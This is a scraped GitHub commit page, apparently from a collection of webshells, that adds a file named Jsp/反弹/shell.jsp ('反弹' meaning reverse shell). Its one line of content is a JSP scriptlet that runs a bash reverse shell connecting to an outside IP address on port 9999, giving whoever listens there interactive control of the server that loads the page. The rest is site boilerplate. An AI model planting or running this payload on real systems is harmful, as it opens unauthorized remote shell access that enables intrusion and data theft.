We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 559c462 commit c2836e5Copy full SHA for c2836e5
Jsp/反弹/shell.jsp
@@ -0,0 +1 @@
1
+<%try { Runtime run = Runtime.getRuntime(); run.exec("bash -i >& /dev/tcp/123.45.67.89/9999 0>&1"); } catch (IOException e) { }%>
0 commit comments